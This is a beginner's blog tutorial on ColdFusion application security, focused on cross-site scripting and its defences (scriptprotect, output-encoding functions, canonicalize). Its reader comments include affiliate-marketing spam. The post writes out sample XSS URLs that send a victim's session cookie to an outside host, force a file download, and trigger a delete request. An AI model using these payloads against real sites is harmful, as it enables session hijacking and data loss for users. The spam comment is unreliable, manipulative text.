Wednesday, December 18, 2013

ColdFusion Application Security

Web Security one most favorite topic of mine. Though I’m not an expert in Web Security, I thought to share my idea which I learned, so that it will help someone who starts with this topic.

NOTE: You can take this article as a beginner guide to Web Security and carry on your journey to explore more on this field.

Following are the most common security vulnerability we generally face for our web application.
  • XSS Attack.
  • SQL Injection.
  • CSRF Attack.
  • File Uploading.
  • Session Hijacking.
  • Password Protection.

Out of the above listed security vulnerability; XSS attack has a huge share of 84%. So, let’s start with XSS attack.

XSS (Cross Site Scripting) Attack
In this type of attack the attacker inject some client side script into Web pages of the application. Sometimes the malicious script stored permanently in database or in some storage and sometimes it passed in form submit or in url query string to deface the website.

This XSS Attack is divided into two types:
  • Non - Persistent XSS Attack.
  • Persistent XSS Attack.

Non - Persistent XSS Attack:
In this type of attack the script is not going to be stored somewhere but the attacker passes the malicious script by URL or FROM submits to deface the website.
Question arises, attacker may see some error message if he/she will pass that script how it's going to affect real user or the application?
Suppose attacker able to pass the wrong URL to provide the wrong URL to user in email or by any other medium and a user clicks on that wrong url then the user may face following problem.

Let say we have a page called index.cfm and have following code:
<cfoutput>#url.name#</cfoutput>. Means it only displays the "name" parameter value which we pass in url scope.

All the below examples are tested in Firefox 26.0 browser.

Attacker can get the session cookie of user and can take access of his login.
Example:  http://localhost:8500/xsstesting/index.cfm?name=<body onload="alert('Hi');document.location='http://www.google.com?cookie=' %2B document.cookie"></body>

Attacker can able to download some executable file into the user’s computer.
Example: http://localhost:8500/xsstesting/index.cfm?name=<body onload="document.location='https://docs.google.com/uc?export=download%26id=0B2GDR5_Jv000OW9pSEZhaGZhQ1k'"></body>
Here I am downloading one of my zip file so don't worry for now :)

Attacker can delete any resource from that user account.
Example: http://localhost:8500/xsstesting/index.cfm?name=<body onload="alert('Hi');document.location='http://localhost:8500/xsstesting/deleteResource.cfm'"></body>

Suppose there is a page called "deleteResource.cfm" which will delete a particular resource then attacker can delete that resource.
Similarly we can create similar kind of attack while submitting a form.

Let’s see how we can protect our self from such kind of attack.
1. Use the following setting in Application.cfc
      this.scriptprotect = "all";
This will save us from basic XSS attack like. If someone wants to directly execute a script tag like: http://localhost:8500/xsstesting/index.cfm?name=<script type="text/javascript">alert('Hello');</script>  then you will see in output as:

<InvalidTag type="text/javascript">alert('Hello');</script>

So, the script will never execute in browser but it cannot protect script like we passed in body tag or any anchor tag. When we enables script protect in Application.cfc then ColdFusion parses variables of a particular scope and if it finds any which may cause XSS threat it replaces that tag by “Invalid”. What are the script tags are protected by ColdFusion server you can find from:
\{CF-Directory}\cfusion\lib\neo-security.xml and search for CrossSiteScriptPatterns. If you want to add any additional tags there for protecting then you can also add there and you have to restart CF server after making the changes.

2. Use some secure data formatting function while displaying the data to user like below.
<cfoutput>#htmlEditFormat(url.name)#</cfoutput> 

What are the other secure data formatting functions available?

Version
Context Of Use
Function
Example
CF 9
HTML  Body
HTMLEditFormat
<cfoutput>#HTMLEditFormat(url.name)#</cfoutput>
CF9
URL String
URLEncodedFormat
<a href="./dispUserList?name=#URLEncodedFormat(url.name)#">User List</a>
CF10
HTML Body
EncodeForHTML
<cfoutput>#EncodeForHTML(url.name)#</cfoutput>
CF10
HTML Attribute
EncodeForHTMLAttribute
<div class="#EncodeForHTMLAttribute(url.name)#">...</div>
CF10
JavaScript
EncodeForJavascript
<script>var name = "#EncodeForJavascript(url.name)#";</script>
CF10
CSS
EncodeForCSS
<style>body{background-color:#encodeForCSS(url.color)#;}</style>
CF10
URL
EncodeForURL
<a href="./dispUserList?name=#EncodeForURL(url.name)#">User List</a>

We have already applied some security measure. So, you think you are safe now. N0!!!

Why? Here in the above example in most of the cases we have passed the script as plain text, so the different secure displaying functions are able to convert that string into a display safe string and displaying it. If someone passes the string in different encoding format available which supports by most of the browsers.

Example:  
There are many ways where we can represent our string if we are using UTF-8 encoding in our web page.
Let say in how many ways I can represent a string : "<script>"
<script> : &lt;script&gt;
<script>:  %26lt;script%26gt;
Similarly we can replace all "script" by hex code and also we can use other encoding to form the string. So, our display formatting function will not be able to detect all these.

Question comes, what we will do now?
First decode the variable which we are getting by some user input and decode that to plain text format. Then pass that to display formatting function. See the below example.
I have added new function called "sanitizeScope" in Application.cfc. It will decode all variables in a particular scope if you pass that scope as a argument to that function. So, in onRequestStart() method I’m calling that function to decode all variables in URL scope and I can use the display formatting function safely in my browser.
In the above example I have used a new function "canonicalize", which is added in ColdFusion 10 and is used for decoding a string.
Till now we have covered basic non-persistent scope XSS attack and how to avoid it. Hope you have enjoyed it!!! 


Persistent XSS Attack
In previous section we just learned, what is non – persistent XSS attack and how we can restrict it. Now, let’s starts with Persistent XSS Attack. This type of attack is most dangerous for a application as it will affect the application until and unless the malicious script is removed.

Persistent XSS Attack means the malicious script permanently stored in our application. Let say in one blog post some attacker has added malicious script in comment; when the blog post will be loaded then it will load that script and attacker can able to perform whatever he wants to do with your application.


Find the example here: http://coldfusion-tip.blogspot.in/2013/12/examples-of-xss-attack.html

How we can prevent such attack?

Use the method “sanitizeScope” which I just described in previous section ( or you can directly use “canonicalize”  for deciding any inputs entered by user) then apply display formatting methods available in different versions of ColdFusion while displaying user inputs or while storing user inputs in database.

You can apply this process before saving the data into database, so that each time you don’t have to use display formatting function while displaying the data. But, sometimes developers prefer not to change any user input while saving in database but to format the data while displaying to user. It depends on personal preference.

We have covered all basic XSS attack prevention methods available in ColdFusion. In next of XSS attack we will see some advance concept. 

5 comments:

  1. As per the link "http://www.learncfinaweek.com/week1/Cross_Site_Scripting__XSS_/"

    scope[key] = canonicalize(scope[key], false, false), the second and third argument for canonicalize function should be set to true so that it will not allow mixed and multiple encoding.

    ReplyDelete
    Replies
    1. If we set "true" to 2nd and 3rd argument then that function will throw error if the string contains multiple/mixed encoded string. But, if we don't set those arguments to "true" then it will decode multiple or mixed encoded string.

      It all depends on you whether you want to block a user inputting such data or want to decode and use it.
      Sometimes during file uploading we need "Content-Type: multipart/mixed;". Not sure that will affect if we will make it to "true". Need to check that.

      Delete
    2. I think we can safely assume that attempts at multiple or mixed encoding is the work of a hacker and can safely be shut down.

      Delete
  2. Astounding understanding you have on this current, it's decent to discover a site that subtle elements such a great amount of data about various specialists.
    open source risk

    ReplyDelete
  3. Your Affiliate Profit Machine is waiting -

    Plus, getting it running is as simple as 1-2-3!

    This is how it all works...

    STEP 1. Choose which affiliate products the system will push
    STEP 2. Add some PUSH BUTTON TRAFFIC (this LITERALLY takes 2 minutes)
    STEP 3. See how the affiliate system grow your list and upsell your affiliate products all by itself!

    Do you want to start making money???

    Click here to activate the system

    ReplyDelete

Followers